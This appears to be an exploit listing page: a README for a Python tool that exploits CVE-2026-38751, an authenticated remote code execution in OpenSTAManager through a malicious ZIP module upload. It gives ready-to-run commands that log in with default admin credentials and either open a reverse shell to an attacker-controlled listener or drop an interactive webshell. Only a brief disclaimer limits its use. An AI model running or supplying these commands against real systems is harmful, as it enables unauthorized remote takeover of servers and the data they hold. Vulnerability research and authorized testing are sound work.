Exploit for Unrestricted Upload of File with Dangerous Type in Devcode Openstamanager CVE-2026-38751

## https://sploitus.com/exploit?id=AA94A761-B153-510F-9E5E-FF9EEAD8595B
# CVE-2026-38751 — OpenSTAManager Module Upload RCE

Authenticated RCE via unvalidated ZIP upload in the module update endpoint.

**Affected:** OpenSTAManager <= 2.10.x

## Requirements
pip install requests

## Usage
```bash
# Reverse shell (Penelope or any listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444

# Interactive webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive
```

## References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-38751

## Disclaimer
For authorized penetration testing and educational purposes only.